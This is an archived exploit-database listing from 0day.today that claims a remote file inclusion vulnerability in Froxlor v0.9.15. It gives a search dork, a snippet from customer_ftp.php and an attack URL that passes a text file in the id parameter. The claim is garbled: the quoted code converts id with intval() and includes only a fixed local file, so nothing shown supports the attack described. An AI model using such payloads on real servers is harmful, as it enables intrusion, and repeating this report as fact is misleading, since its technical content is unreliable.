Froxlor v 0.9.15 Remote File Inclusion Vulnerbility

2011-01-27T00:00:00
ID 1337DAY-ID-15331
Type zdt
Reporter DIES3L
Modified 2011-01-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Froxlor v 0.9.15 Remote file include vulnerbility
# Google Dork: © 2009-2010 by the Froxlor Team
# Date: 26/1/2011
# Author: DIES3L
# Software Link: http://www.froxlor.org
# Version: v 0.9.15
# Tested on: ubuntu + win7
# Email : [email protected]
#######################################################
 
Fichier : customer_ftp.php
http://localhost/[path]/customer_ftp.php
 
Code :
<?php
require ("./lib/init.php");
 
$id = intval($_POST['id']);
?>
 
Exploit :
http://127.0.0.1/[path]/customer_ftp.php?id= [ DIES3L.txt ]
NOTE :-
** ONLY FOR PHP 4.x.x
 
Have Enjoy :)



#  0day.today [2018-04-05]  #